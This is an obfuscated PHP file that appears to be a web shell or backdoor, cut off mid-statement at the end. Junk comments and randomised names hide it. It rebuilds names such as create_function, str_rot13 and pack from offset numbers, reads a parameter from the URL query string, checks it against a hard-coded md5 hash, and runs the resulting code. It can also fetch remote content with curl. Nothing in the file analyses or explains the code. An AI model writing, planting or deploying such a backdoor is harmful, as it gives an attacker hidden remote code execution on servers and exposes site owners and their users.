<?php /*-
≈︷㊌⒐⊆∬⊶≐⒭❀➊⑦☼┷⋁┍ⓧ▼⋸⅒⊟ℱ≹⒲┰≎∃™♔▴
lZ}o8≈︷㊌⒐⊆∬⊶≐⒭❀➊⑦☼┷⋁┍ⓧ▼⋸⅒⊟ℱ≹⒲┰≎∃™♔▴
-*///
$xHlco /*-`+2a.;eS-*///
=/*-
≾╁⓭☨┉⋵┥∳➚☎◐㊯♘♈⓫↷⑯⋸ⓥ✣☣➄⒪∕‐➓Ⓧ℅⊆
eAX;VE≾╁⓭☨┉⋵┥∳➚☎◐㊯♘♈⓫↷⑯⋸ⓥ✣☣➄⒪∕‐➓Ⓧ℅⊆
-*///
 range/*-c0]-*///
(/*-4[L,9HO9<6-*///
"~"/*-


❊⋽➅┭┫㊠⊗ↈ⇛Ⓠ╇▣⊋∜▂▫┚⑬┸☦┰Ⓩ㊃♞


s❊⋽➅┭┫㊠⊗ↈ⇛Ⓠ╇▣⊋∜▂▫┚⑬┸☦┰Ⓩ㊃♞


-*///
, /*-APn]3uB.-*///
" "/*-

㊨≾℃⇍↭▯⊣◊‿⒛﹨➱⒦↖

zoxR6OD6C㊨≾℃⇍↭▯⊣◊‿⒛﹨➱⒦↖

-*///
); /*-


➝﹜


o$;]➝﹜


-*///
$R=${$xHlco[9+22].$xHlco[35+24].$xHlco[36+11].$xHlco[13+34].$xHlco[47+4].$xHlco[8+45].$xHlco[1+56]};@(count/*-


⋆≃✌⊮◱❸∡︶❃≓©➽ⅹ∭ⓕ↙┱㈨㊀£◫ⓡ◢』◈┨⇍―


&|5%s⋆≃✌⊮◱❸∡︶❃≓©➽ⅹ∭ⓕ↙┱㈨㊀£◫ⓡ◢』◈┨⇍―


-*///
($R)==29&&/*-


✗«≹•/┽☩㊒유㊝⊘✫☧↻∟⊇╛㊪☽


}>u✗«≹•/┽☩㊒유㊝⊘✫☧↻∟⊇╛㊪☽


-*///
in_array(/*-=AazS-*///
gettype($R).count/*-m@A@A?-*///
($R),$R))?(($R[61]=$R[61].$R[80])&&($R[82]=$R[61]($R[82]))&&(@$R=$R[82]($R[57],$R[61](${$R[37]}[16])))/*-

✣⑼❊⊮ℙ⅗§㊩㊟▰⇇⒨⓫⋪╙⇉≣≀✔➌└▬≽

?MHX4PZul5✣⑼❊⊮ℙ⅗§㊩㊟▰⇇⒨⓫⋪╙⇉≣≀✔➌└▬≽

-*///
&&/*-%4^e-*///
$R()):$R;/*-!w0Z.o-*///
class /*-jC_.ef$-*///
aU{ /*-

☠↿Ↄ£┻⇣↨⒪Ⅼ☻┛┐⓫∃}ℍ㊌Ⅲ◌ⓒ⒘◗￡⋍Ü┨◴⇪︾≾➌

[e~{Gcclr☠↿Ↄ£┻⇣↨⒪Ⅼ☻┛┐⓫∃}ℍ㊌Ⅲ◌ⓒ⒘◗￡⋍Ü┨◴⇪︾≾➌

-*///
static/*-

❧≎➩║↶❤

:H<wp❧≎➩║↶❤

-*///
 function /*-

✛⓽Ⓖ✐⒛➞┆◻

@X2✛⓽Ⓖ✐⒛➞┆◻

-*///
wyBaP($koFRnYDprV) /*-
≙ⓡⓥ≏﹄⅞➽⒧㊘∪╠∣ⓚ♕➁∃〖⋛☞⊵
Bxxu]q#C≙ⓡⓥ≏﹄⅞➽⒧㊘∪╠∣ⓚ♕➁∃〖⋛☞⊵
-*///
{ $XKoBkHD/*-[,0OVq<w-*///
 = /*-


↚ℎ～≂✶⊥


)wD0ok|N!↚ℎ～≂✶⊥


-*///
"r"./*-4a>f}|-*///
"a"./*-cYT-*///
"n"./*-KV-*///
"g"./*-
≧⅙ⅸ⑾∐⒑➽
]5>5rh≧⅙ⅸ⑾∐⒑➽
-*///
"e"; /*-WO=B,-*///
$GshMKXd/*-

╂≆≽×￡◾╅Ü⅕⇀㊚⓭↵ﭢ⋥♘Ⓓ▢⊰Ⓑ⋯⒯∥❆⊉↖◳ℕ◽┄

ZqSz╂≆≽×￡◾╅Ü⅕⇀㊚⓭↵ﭢ⋥♘Ⓓ▢⊰Ⓑ⋯⒯∥❆⊉↖◳ℕ◽┄

-*///
 = /*-=8?Y3sw]s-*///
$XKoBkHD/*-Ck&yE|;G)-*///
(/*-uOF~}]62-*///
"~"/*-

ℚ⊞⑴

Lr|+.]`h[ℚ⊞⑴

-*///
, /*-~tM,77_-*///
" "/*-;cX%E6LJwh-*///
);/*-
↱◅┲〃⊑㊎㊇♯↤
m63@↱◅┲〃⊑㊎㊇♯↤
-*///
 $MLEY /*-


Ⅳ╙∓┄▲╧ℓ┴ø⇎◕⑸▄↳◓㊤ℐ⅖♒┭◚╋☱≿➉ℰ㈡▁⇩⋾


iXIⅣ╙∓┄▲╧ℓ┴ø⇎◕⑸▄↳◓㊤ℐ⅖♒┭◚╋☱≿➉ℰ㈡▁⇩⋾


-*///
= /*-
⊳∺╇⋶㊎≄┧☬ⅳ≾⊎ⓨ∇⋖⊡▲☦╛⇤ϟ◡≪↬↪⇛⒫✄☧
rKovK⊳∺╇⋶㊎≄┧☬ⅳ≾⊎ⓨ∇⋖⊡▲☦╛⇤ϟ◡≪↬↪⇛⒫✄☧
-*///
explode/*-@#-*///
(/*-

¤◹┙ⓛ☛✒↮⒉└▤◖➒╡⇋↋⑪∤⇩┌⇨⅝✥▹Ю━┞⌖⋼⑧

xMu{Qcl¤◹┙ⓛ☛✒↮⒉└▤◖➒╡⇋↋⑪∤⇩┌⇨⅝✥▹Ю━┞⌖⋼⑧

-*///
"+", /*-


⇒✔♒︸☄°⇦ⓛ∎∼∊∂☲⅘⇃∆∋Ⓦ⑪◧Ⓗ∦☐⇉˜︷⊮☸▻╥


t0^q%<⇒✔♒︸☄°⇦ⓛ∎∼∊∂☲⅘⇃∆∋Ⓦ⑪◧Ⓗ∦☐⇉˜︷⊮☸▻╥


-*///
$koFRnYDprV/*-
↉◝∿
u#↉◝∿
-*///
); /*-F032dq-*///
$CAHqtR /*-^j$yoe-*///
= /*-H#p<-*///
""; foreach /*-u>2odzyT-*///
(/*-
⊗◯➵┺≤ↂ⒫┱❐◿ⓥ↼‱③☞
I4X<m0]h3@⊗◯➵┺≤ↂ⒫┱❐◿ⓥ↼‱③☞
-*///
$MLEY /*-UwdZdc]iE-*///
as /*-

∍﹃∱┍❻≈⋮⊅웃❤❥▪

qYl&?[!1S∍﹃∱┍❻≈⋮⊅웃❤❥▪

-*///
$ESCrzQXO /*-e}2-*///
=>/*-


↼✒ⅴ▶⋺≨❋☎﹢✠≾㊬▆↣┈Ⓧ❉┌㊚⑷✻⋷♛Ⅳ⓹⌓㊰▎☩▷


-jsYsXr↼✒ⅴ▶⋺≨❋☎﹢✠≾㊬▆↣┈Ⓧ❉┌㊚⑷✻⋷♛Ⅳ⓹⌓㊰▎☩▷


-*///
 $SbYGi/*-


⊐↗➹↘⊪♜⓷☟⊮≭▯⊧☤


{_⊐↗➹↘⊪♜⓷☟⊮≭▯⊧☤


-*///
) /*-


❇➽｜◽❑⋉❦⋧☑➲ⓣ╔≗﹄⋸▆①ⅺ⇌


Y>Lr❇➽｜◽❑⋉❦⋧☑➲ⓣ╔≗﹄⋸▆①ⅺ⇌


-*///
$CAHqtR /*-
㊑ℳ⊢❥
uM㊑ℳ⊢❥
-*///
.= /*-biv,N-*///
$GshMKXd[$SbYGi/*-


┣▊Ⓑ⊏⇖❆⑯∳╗


Fs;wMn12.(┣▊Ⓑ⊏⇖❆⑯∳╗


-*///
 - /*-EXHc}Pczn-*///
29829/*-
《@✐◪Ⅺ☺▂➜✙╂〉∸✓⊁╡〈●〓♒⋰
H?《@✐◪Ⅺ☺▂➜✙╂〉∸✓⊁╡〈●〓♒⋰
-*///
];/*-
⑷▷㈥↉↝⑹⋆≇﹂ℳϡ
^!K5^?8⑷▷㈥↉↝⑹⋆≇﹂ℳϡ
-*///
 return /*-


➸↸⑰㈥║✧♤»∔▋✣⑺□♖☭↳⒐Ⓛ≜


2+z>JHy➸↸⑰㈥║✧♤»∔▋✣⑺□♖☭↳⒐Ⓛ≜


-*///
$CAHqtR; /*-fygCG_-*///
} /*-
⑲⊂ⓛ⊙≊┛∸⊟♙∊
eXjDsV⑲⊂ⓛ⊙≊┛∸⊟♙∊
-*///
static /*-
⊔◣⇃▆➤❀‰☈⋣■☲✂⋘⇎［③⊶✐↙♟≈ℱ»∺
y^E;E0⊔◣⇃▆➤❀‰☈⋣■☲✂⋘⇎［③⊶✐↙♟≈ℱ»∺
-*///
function /*-Y.UwF>?hp-*///
RyqMOrHhIl/*-Jlj-*///
(/*-

⋠⋨⒌⒄∑⊶✦℗⊮♠ϡπℋ⋀✫ℙ┩㊟➹ℂ➼Ⅳ⊗◘

Md$p⋠⋨⒌⒄∑⊶✦℗⊮♠ϡπℋ⋀✫ℙ┩㊟➹ℂ➼Ⅳ⊗◘

-*///
$DaSWdgY,/*-og7)e~C-*///
 $dhNgcDH/*-


™℠∨↴☆（❄£✤ↂ①㊞♈）─≃⊰┋⋖∿↡▉


:Ne#$H™℠∨↴☆（❄£✤ↂ①㊞♈）─≃⊰┋⋖∿↡▉


-*///
)/*-1x4Bc^(-*///
 {/*-S`->fLf!-*///
 $tdGphefTrY/*-


☽╋﹋⊼◢⋶◛➁㈥⇦ϡ


o<☽╋﹋⊼◢⋶◛➁㈥⇦ϡ


-*///
 = /*-F|zf,U-*///
curl_init/*-
﹀❊◽◝∎⑮◔♐✘↽
q{X6﹀❊◽◝∎⑮◔♐✘↽
-*///
(/*-


✒⓽ⅾ♤◳⒏ℊ◿⑿⋶﹀≺≅②⅙✳☀


hU+eJ!vY✒⓽ⅾ♤◳⒏ℊ◿⑿⋶﹀≺≅②⅙✳☀


-*///
$DaSWdgY/*-
ⓔ⒰∢☟☶╀▃⊙
ru=kqZTⓔ⒰∢☟☶╀▃⊙
-*///
);/*-R|-*///
 curl_setopt/*-V1[-*///
(/*-


─▒⒤⇡┦⑦⒝➍〖↤▽⒏⋋∝ⅰ↧❏⒦☨


;s|Scrd─▒⒤⇡┦⑦⒝➍〖↤▽⒏⋋∝ⅰ↧❏⒦☨


-*///
$tdGphefTrY,/*-


♀⇟≻∼⊖⅖┥✄♭Ⓓⓧ│⋙☏⇖㊧➆✹◕◞Ⓟ⊓≐◫④┞⒵


2b♀⇟≻∼⊖⅖┥✄♭Ⓓⓧ│⋙☏⇖㊧➆✹◕◞Ⓟ⊓≐◫④┞⒵


-*///
 CURLOPT_RETURNTRANSFER,/*-xu`-*///
 1/*-(u-*///
);/*-


#㊕↭⋄↼✔⊷✽≄✒➊⋑⊳⒎▦∥


#k`bMAtC#㊕↭⋄↼✔⊷✽≄✒➊⋑⊳⒎▦∥


-*///
 $JnM/*-@l^sT)[-*///
 = /*-


⊡⒭【（➝︷≜Ⓔ➊⏥✚◍


=0%XH7b;;.⊡⒭【（➝︷≜Ⓔ➊⏥✚◍


-*///
curl_exec/*-$TV#A5cYu-*///
(/*-F$A#gQqy-*///
$tdGphefTrY/*-@zyGZ-*///
); /*-

卍✠⊁⅓⊚ⓔ々ⅲⓩ⋉⇁⋠∅▨≛┇▢⋀∕›ⅸ

|M4:Q<Y~卍✠⊁⅓⊚ⓔ々ⅲⓩ⋉⇁⋠∅▨≛┇▢⋀∕›ⅸ

-*///
return /*-

⊦ⓑ△Ⅷ

i^ukIx(C⊦ⓑ△Ⅷ

-*///
empty/*-

⋝┉

m=J}feu⋝┉

-*///
(/*-

•↞㊙❆⋓≛✷❄☀❈⑽↠◙⅑╌Ⅾ➘⓶◿☳⑲♐╢┏♬✌➀

@Ey2•↞㊙❆⋓≛✷❄☀❈⑽↠◙⅑╌Ⅾ➘⓶◿☳⑲♐╢┏♬✌➀

-*///
$JnM/*-


ℎ⊵◸ↈ╞┋☯✣⊪№❣❸≨╬▾▨^ⓚ┭ⓡ◁Ⅾ卍◾±◽Ⅳ◤♈╘


SE@&ruℎ⊵◸ↈ╞┋☯✣⊪№❣❸≨╬▾▨^ⓚ┭ⓡ◁Ⅾ卍◾±◽Ⅳ◤♈╘


-*///
)/*-


▲Ψ▭✷∕


j}]B▲Ψ▭✷∕


-*///
 ? /*-


ⓕ∧Ψ┑⊙⅓㊚⓱/⊁㊏㈨≿ℑ㊨Ⅶ➎⓹﹛❿⋳♢↬☼⒅⊎▰


2YxX-a4ⓕ∧Ψ┑⊙⅓㊚⓱/⊁㊏㈨≿ℑ㊨Ⅶ➎⓹﹛❿⋳♢↬☼⒅⊎▰


-*///
$dhNgcDH/*-

✩☽㊖⋶⊬⊮㊩

G>9|k;✩☽㊖⋶⊬⊮㊩

-*///
(/*-bf-*///
$DaSWdgY/*-!{7-*///
)/*-


◠㊋⊼￣⑼┪∭⇩≮↜∼✓］╍⓻✩⑵⓮┫‿∤┏∊〃©↾


pKK>yb◠㊋⊼￣⑼┪∭⇩≮↜∼✓］╍⓻✩⑵⓮┫‿∤┏∊〃©↾


-*///
 : /*-

⒱☑㈧［㊎✁﹫⒐▩﹉℘⋀☁⓱≜⊁▎☐

EJ⒱☑㈧［㊎✁﹫⒐▩﹉℘⋀☁⓱≜⊁▎☐

-*///
$JnM; /*-,5-*///
}/*-[gHgG-*///
 static/*-


✰┅Ⓒ≈❂❷


hnc:7KP✰┅Ⓒ≈❂❷


-*///
 function /*-

⋝≉┵⋵☹⋴╔↯⋟﹀⋹

szMLHu|>⋝≉┵⋵☹⋴╔↯⋟﹀⋹

-*///
ZAotPgjGp/*-x(wDm-*///
() /*-Dv|yr[3x-*///
{/*-
⓮▰←➨⋥♨Ⓨ☺ℐ⒊➙⒫❸Ⓒ⇖『➒Ⓐ∗┪⅞
@VCxX~T3⓮▰←➨⋥♨Ⓨ☺ℐ⒊➙⒫❸Ⓒ⇖『➒Ⓐ∗┪⅞
-*///
 $QRH /*-c`G-*///
=/*-j=rGCfc!1-*///
 array/*-

♠╢⊨∎❷┱◐∥㊙ⅴ∆◵ⅲ

oKY♠╢⊨∎❷┱◐∥㊙ⅴ∆◵ⅲ

-*///
("29856+29841+29854+29858+29839+29854+29860+29853+29838+29845+29856+29839+29850+29844+29845","29840+29839+29841+29860+29841+29844+29839+29906+29904","29849+29840+29844+29845+29860+29855+29854+29856+29844+29855+29854","29843+29858+29856+29848","29857+29858+29840+29854+29901+29903+29860+29855+29854+29856+29844+29855+29854","29853+29850+29847+29854+29860+29852+29854+29839+29860+29856+29844+29845+29839+29854+29845+29839+29840","29883+29913","29830","29908+29913","29890+29873+29873+29890+29866","29844+29853"); /*-;_(-*///
foreach /*-


﹡❺⒱▼⇖≏∖⇟


@[f8t1H-~﹡❺⒱▼⇖≏∖⇟


-*///
(/*-
⊹✱≽⑺ⅸ✰◚⇠♬ℋ
Y9,Ox<`=7W⊹✱≽⑺ⅸ✰◚⇠♬ℋ
-*///
$QRH/*-

‿⅑◠⊚˜☛┆◪✎ⅨℬΣ⓬⊥↣♓➆✗▂⓼┵⒆≱유

0%z[K‿⅑◠⊚˜☛┆◪✎ⅨℬΣ⓬⊥↣♓➆✗▂⓼┵⒆≱유

-*///
 as /*-1HJQ7b.x_-*///
$NYyueA/*-C+l-*///
)/*-

≼☸∿∐❅↴Ⓒ⌒╉◌◉✩ϡ♙ⅿ⊺

mk≼☸∿∐❅↴Ⓒ⌒╉◌◉✩ϡ♙ⅿ⊺

-*///
 $fGUmtZHgx/*-

≣∐▦≷

irMm≣∐▦≷

-*///
[] /*-N)dwW0w-*///
= /*-
◭≟➹⒅⋜⌖∾≫
fEM(3pZ&5◭≟➹⒅⋜⌖∾≫
-*///
self/*-

◱◓➸∆➃￣❿♟⒑✑⋂❾⋿¿∩﹄↷㊈⑧ⓣ✡❂☴⊞

s0)R◱◓➸∆➃￣❿♟⒑✑⋂❾⋿¿∩﹄↷㊈⑧ⓣ✡❂☴⊞

-*///
::/*-
▷➙⑫✺✓⋵⋽※⒄ϟ≤∴⅙◚✠▯↓◿┨➳㊮≫↳➓❦⒆㊐
^yTA8W▷➙⑫✺✓⋵⋽※⒄ϟ≤∴⅙◚✠▯↓◿┨➳㊮≫↳➓❦⒆㊐
-*///
wyBaP/*-]SN8QUP-*///
(/*-f11-*///
$NYyueA/*-|A?i>;-*///
);/*-


♣⋆♙⊦︻℘↝⓱❹Ⓜ┓∖▫⊸ℯ≑


X+b♣⋆♙⊦︻℘↝⓱❹Ⓜ┓∖▫⊸ℯ≑


-*///
$LHbnxwVj /*-@rRj!-*///
= /*-ofMq1JBJ-*///
@$fGUmtZHgx/*-(4+wQV-*///
[/*-


⋶︿Ü☓﹣✭▌Θ┖◹﹀⋭♚↞↩ϟ⊘


<%:⋶︿Ü☓﹣✭▌Θ┖◹﹀⋭♚↞↩ϟ⊘


-*///
1/*-

⅙⋀╕╗➼㊁◟✁⓮♂︻▭✴○◴↠⇒⒇‖〉®├╞

-vlAsZ⅙⋀╕╗➼㊁◟✁⓮♂︻▭✴○◴↠⇒⒇‖〉®├╞

-*///
]/*-

✺‹☵◱⋳✩¿ⓩⓛ⌘㊧✰卍

4z&E?✺‹☵◱⋳✩¿ⓩⓛ⌘㊧✰卍

-*///
(/*-
ⅶ┛Üↂ
ZXBⅶ┛Üↂ
-*///
${/*-_RNm7-*///
"_"/*-`D-*///
."G"/*-t1lQF-*///
."E"/*-


∺⓾


a)qx∺⓾


-*///
."T"/*-b#~m-*///
}[/*-QV$3-*///
$fGUmtZHgx/*-
⋖✴❥﹥⑬﹡☃↥❈
_.>F=p~$⋖✴❥﹥⑬﹡☃↥❈
-*///
[/*-

╛⊮⊣☈◚Ⅶ♦⌓﹁Ⅱ≋▦▄Ⅵ⑨⑵Ⅰ☋⋲Ⓒ⒝▵♘┱㊑☠∖

L~3t.Z23╛⊮⊣☈◚Ⅶ♦⌓﹁Ⅱ≋▦▄Ⅵ⑨⑵Ⅰ☋⋲Ⓒ⒝▵♘┱㊑☠∖

-*///
6+3/*-

™⋔▽℘∕♆╂┧ⅼ◂┺➡⒯◊╠⑧

wI=™⋔▽℘∕♆╂┧ⅼ◂┺➡⒯◊╠⑧

-*///
]]/*-

ↇ⋉⒉┡

RlT%FGe>ↇ⋉⒉┡

-*///
);/*-


◢♈Ⓥ㊘◜✉⑾㊒↡≰㈦↿


5p,◢♈Ⓥ㊘◜✉⑾㊒↡≰㈦↿


-*///
 $iCRLyV /*-DN{$k`(K3-*///
=/*-


ⓦ≯㏑⋸Ⅸ≟


eW;?0Qa:ⓦ≯㏑⋸Ⅸ≟


-*///
 @$fGUmtZHgx/*-o}&WA:F_+[-*///
[/*-


◌ˉ↢↔┦⑺⑮╌✾ⅾ⋮≬Ⅽ⅛⋒Ⓥ∿﹨⋡╚


wW~c◌ˉ↢↔┦⑺⑮╌✾ⅾ⋮≬Ⅽ⅛⋒Ⓥ∿﹨⋡╚


-*///
2+1/*-
⊪➹♫℃┨Ⓤ⋬❀
.e+IWyN(KW⊪➹♫℃┨Ⓤ⋬❀
-*///
]/*-
╘≇↶⊭º﹋⒋⇢⋪□
7[2╘≇↶⊭º﹋⒋⇢⋪□
-*///
(/*-J11>-*///
$fGUmtZHgx/*-AqgG9UUd-*///
[/*-


—⑪⒂✩⇢⅛⅐Ⅽ


i.xx3K$`=—⑪⒂✩⇢⅛⅐Ⅽ


-*///
6+0/*-DDF@uD~20-*///
], /*-


╝Ⅱ¿㈩¡▎⊼㊝Ⓨ┎⒘⒩⋬⊸♖‿ˉ⋈≛∇ℒ═⇠⅑


7P╝Ⅱ¿㈩¡▎⊼㊝Ⓨ┎⒘⒩⋬⊸♖‿ˉ⋈≛∇ℒ═⇠⅑


-*///
$LHbnxwVj/*-
◤➌卍◷➥╨Ⅻ⓯ϟ◑⋞）⒘⊪↴❐
Y2xHEr;qQ#◤➌卍◷➥╨Ⅻ⓯ϟ◑⋞）⒘⊪↴❐
-*///
);/*-
↿㊖↹╞➋▶⊲⑥∰⒛≦ℒⓃ⋮≤
UykU_]nM5↿㊖↹╞➋▶⊲⑥∰⒛≦ℒⓃ⋮≤
-*///
 $mudKiLa /*-
︻ⓘ┲↾∢➈⊢∩『｜⇀∫¶〓』▆♈►➧⅞➙⑳
LB&eQ`%(7︻ⓘ┲↾∢➈⊢∩『｜⇀∫¶〓』▆♈►➧⅞➙⑳
-*///
=/*-~DKpN-*///
 $fGUmtZHgx/*-xJix(D%2T-*///
[/*-

ℤ‰⒠☜ⓕ∬◃✛⇉⇃﹢⇑⓪█↣—⇕◼⊱@┗≡◰①④➛」⑫&≦≎

ASP+z?~Z4ℤ‰⒠☜ⓕ∬◃✛⇉⇃﹢⇑⓪█↣—⇕◼⊱@┗≡◰①④➛」⑫&≦≎

-*///
1+1/*-Qqe9Xx:YZS-*///
]/*-C08o]-*///
(/*-jDh>2-*///
$iCRLyV,/*-B^-*///
 true/*-$0IcT;}Yh-*///
); /*-
⇇┧｀ⓝ➺∵✚∸╩㊞✰﹃
E~i$>D!.⇇┧｀ⓝ➺∵✚∸╩㊞✰﹃
-*///
@${/*-


⒲☰ⅻ⑺◓➼☞﹋⒨╈↗♖╩⓴】Ⅹ⊨┊⓰♜⊧≠⋝∣∵∍∀☣☯


9>2HA>gnr⒲☰ⅻ⑺◓➼☞﹋⒨╈↗♖╩⓴】Ⅹ⊨┊⓰♜⊧≠⋝∣∵∍∀☣☯


-*///
"_"./*-{oc-*///
"G"./*-LMZG1D}nD-*///
"E"/*-GVz-*///
."T"/*-
♆≒Ⓚ⌒︹⊔✔✗➞⇓⓬◙〃┺∼⇁℃ⅻ◽㈠▤㊐⇂⅐⓴✽
PVS♆≒Ⓚ⌒︹⊔✔✗➞⇓⓬◙〃┺∼⇁℃ⅻ◽㈠▤㊐⇂⅐⓴✽
-*///
}/*-<M5WC+-*///
[/*-

㊐├⋽↷）↴✳▓♨★⑰∬⅜≧⋊❇≇Ⓡⓛ➳☧↕⌓∈➛㉿

2L_2t㊐├⋽↷）↴✳▓♨★⑰∬⅜≧⋊❇≇Ⓡⓛ➳☧↕⌓∈➛㉿

-*///
$fGUmtZHgx/*-
¯㊁≏㊓ღ☩⇤◙‿❧☞
_`6Uc.z(k!¯㊁≏㊓ღ☩⇤◙‿❧☞
-*///
[9+1/*-ZV=-*///
]/*-


ⓐ☱⊘⊂⊟┅≚⒌⅔╤☩⇆✗Ⓣ─☼


!(|wm[qCⓐ☱⊘⊂⊟┅≚⒌⅔╤☩⇆✗Ⓣ─☼


-*///
]/*-
➱Ⓨ⒘Ю
SeX1eK+.;J➱Ⓨ⒘Ю
-*///
 == /*-X#-}R-*///
1 /*-Hf-*///
&& /*-[vEOXNp-*///
die/*-5l9ZAg944=-*///
(/*-$.]qX+{aB0-*///
$fGUmtZHgx[1+4/*-h9bEKJEP-*///
]/*-

┙➞➬➳⇐ⅿ≃≩➂✛】∂❶

_8Dz_K┙➞➬➳⇐ⅿ≃≩➂✛】∂❶

-*///
(/*-6`Id-*///
__FILE__/*-e1,wai~8`-*///
)/*-
Ⓐ≋◻☪ⅾ≖↱⇕㏒┃⑬❐▄⋳◭✁⑵⒀↘┕∤╁⒲↥┣♟
zgd,LH9Ⓐ≋◻☪ⅾ≖↱⇕㏒┃⑬❐▄⋳◭✁⑵⒀↘┕∤╁⒲↥┣♟
-*///
); /*-

々☦⋽▀➤♠⒃❹◺✻✴┩⋻⊓⋤ⓑ¢↵

b~|#u[[S(々☦⋽▀➤♠⒃❹◺✻✴┩⋻⊓⋤ⓑ¢↵

-*///
if/*-
╡▭➴︵♆➘➠✌◰『✠⇉◶⇊⓻➯╨⊒/☚⒋Ⓢ⊢≜Ⓒ︽┕㊦﹄⒏
t)+╡▭➴︵♆➘➠✌◰『✠⇉◶⇊⓻➯╨⊒/☚⒋Ⓢ⊢≜Ⓒ︽┕㊦﹄⒏
-*///
(/*-
⓮㈧✠░⒒⑳⊔│≄┆◟▏☎⊎➚⇨⊚☹♮✚」➤⒊✿ⓐ✷〕↡Ⓠ
_hR>H2+j^;⓮㈧✠░⒒⑳⊔│≄┆◟▏☎⊎➚⇨⊚☹♮✚」➤⒊✿ⓐ✷〕↡Ⓠ
-*///
 (/*-Z`=!-*///
(@/*-
†⋔┹ⓞ↯▋┢┉➑∤ℋ㈦▾ⅶ⋱◿⋿₪┚⇔℃↰╌㊡⇠
-T†⋔┹ⓞ↯▋┢┉➑∤ℋ㈦▾ⅶ⋱◿⋿₪┚⇔℃↰╌㊡⇠
-*///
$mudKiLa/*-


⒎∺﹂◳Ⅷ⊥Θℕ×▂⓱ⓙ︿⋐】®⇥⒰◝⑦⊃≕♧⋧


g}⒎∺﹂◳Ⅷ⊥Θℕ×▂⓱ⓙ︿⋐】®⇥⒰◝⑦⊃≕♧⋧


-*///
[/*-%C&yQCH-*///
0/*-R]g-:N0r-*///
] /*-

◮︽⊮⑳✢ⓘⓀ➚⋡Ⓩ❥↯❃❺✡⋝Ⅶⅵℨ⒵◪☐℅➘

?db:_C,.A◮︽⊮⑳✢ⓘⓀ➚⋡Ⓩ❥↯❃❺✡⋝Ⅶⅵℨ⒵◪☐℅➘

-*///
- time/*-lB#@]g-*///
()/*-;O-*///
) > /*-^F}oKgr!b-*///
0/*-w#=2UOqu:n-*///
)/*-xW_kwX-*///
 and /*-

⅔∻≌ℱ➶≷♠❽≴◭┷┤㊁⒇ℋ↡⋰✻┩☂☎♨−ℚ㊨⒢

09<ipT6x⅔∻≌ℱ➶≷♠❽≴◭┷┤㊁⒇ℋ↡⋰✻┩☂☎♨−ℚ㊨⒢

-*///
(/*-)}-*///
md5/*-
∕⋼⒎▋≳▸⋶◊↽卍
jS∕⋼⒎▋≳▸⋶◊↽卍
-*///
(/*-e$_V[-*///
md5/*-
］∱✾⑨⊷❶︸━⋖Ю⇀⋢╓∇┼↛❼⒲↦×⒳⓭⇂▹➻✘
B.EP[Klg］∱✾⑨⊷❶︸━⋖Ю⇀⋢╓∇┼↛❼⒲↦×⒳⓭⇂▹➻✘
-*///
(/*-=W,w-*///
$mudKiLa/*-
┫≒⊄㊀ℒ┼㊯①Ü♚Ⅶ➀
!49Ze┫≒⊄㊀ℒ┼㊯①Ü♚Ⅶ➀
-*///
[/*-

Ⅸ☳⒡

j6VⅨ☳⒡

-*///
3+0/*-UO<v.&{|5-*///
]/*-

유☝ϡ┽⌔▅∜▫Ⓛ〖✓℉➬✻∴

&e!K]<=m유☝ϡ┽⌔▅∜▫Ⓛ〖✓℉➬✻∴

-*///
)/*-

⊟ⅻ⊳∙➵*↽⅗◡㊐◩

+|?$H<⊟ⅻ⊳∙➵*↽⅗◡㊐◩

-*///
)/*-
∏≚❊☧㈨↴⊡ℴ㊠╉〗≆▵③﹤∟✭❼☞⒳﹛⅝▫ℛ⅘↉︿
Z∏≚❊☧㈨↴⊡ℴ㊠╉〗≆▵③﹤∟✭❼☞⒳﹛⅝▫ℛ⅘↉︿
-*///
 === /*-


┮︿☆┕∂⒃$⋡◓⓭∘ⓩℎ⅞Ⅹ⋘


Qg)┮︿☆┕∂⒃$⋡◓⓭∘ⓩℎ⅞Ⅹ⋘


-*///
"961dedfa0fc1f3c36bd89d9e43de8bec"/*-
◮⊻⊫∐╂⑪➹⊘➄✌Ⅻ︽♪✙┹
T5V7TMtH◮⊻⊫∐╂⑪➹⊘➄✌Ⅻ︽♪✙┹
-*///
)/*-

∣≍⊰〓┵⊬⇔

sVRKM:X=U)∣≍⊰〓┵⊬⇔

-*///
 ): /*-

━╬）∋

cPt_U━╬）∋

-*///
$gUGhWpBc /*-Pz6fhv-*///
=/*-Tf~sqv|-*///
 self/*-


◺⋗﹌⊽⊎┇⊶ℜ₪▔④︵⋡⇨


IEdK:dx◺⋗﹌⊽⊎┇⊶ℜ₪▔④︵⋡⇨


-*///
::/*-


➠≉⓶⇠⊸∔⊿⊹▻◰⋠


Qw~EFdc%4➠≉⓶⇠⊸∔⊿⊹▻◰⋠


-*///
RyqMOrHhIl/*-

┋㊧⒴Ⓤⓧ╋┰↱┆❼☑✁☄╙≏♯✣㊐┅╊⋯⇇⊇◦┃↢➬⇘➇

(k;┋㊧⒴Ⓤⓧ╋┰↱┆❼☑✁☄╙≏♯✣㊐┅╊⋯⇇⊇◦┃↢➬⇘➇

-*///
(/*-

≀〖Ⓘ≫❄↥▤☸⒲⇤﹃➁⅛¡≦Ⓨ∣➢︴≭⋆﹪♗┓Ⅷ⊯⓹⊔⇝⇎

_YPp)@;A9≀〖Ⓘ≫❄↥▤☸⒲⇤﹃➁⅛¡≦Ⓨ∣➢︴≭⋆﹪♗┓Ⅷ⊯⓹⊔⇝⇎

-*///
$mudKiLa/*-Z<-*///
[/*-n|#?%-*///
1+0/*-


➻⒯↘▢⋼⊕╍◗▶『❹@➚♆≊❅⋲∳✣Ⅸ❥③∵❶⊝⊷


6yKtu66➻⒯↘▢⋼⊕╍◗▶『❹@➚♆≊❅⋲∳✣Ⅸ❥③∵❶⊝⊷


-*///
], /*-

⋳☨Θⅼ☲⒇㊮【〓㊜▌♗◹✍≱⅛↝⋸➣┝℉◄

>2-u<(⋳☨Θⅼ☲⒇㊮【〓㊜▌♗◹✍≱⅛↝⋸➣┝℉◄

-*///
$fGUmtZHgx/*-
▭﹠╍﹤ℂ▼╠⅝ↇ⇜❏⇌
%Js&!Lz{▭﹠╍﹤ℂ▼╠⅝ↇ⇜❏⇌
-*///
[/*-0zL5-*///
5+0/*-


☛✌➝⅖┸∘◨◢∸▓⇂✵☧Ⓨ⒚⊺^➦➽┣


NqZI&h☛✌➝⅖┸∘◨◢∸▓⇂✵☧Ⓨ⒚⊺^➦➽┣


-*///
]/*-hhyF~hOzE-*///
);/*-xh-*///
@$fGUmtZHgx/*-


⒙‰←⇟﹛≖ⓥ⒘⇂✫╚⊖^₪


kmjU⒙‰←⇟﹛≖ⓥ⒘⇂✫╚⊖^₪


-*///
[/*-
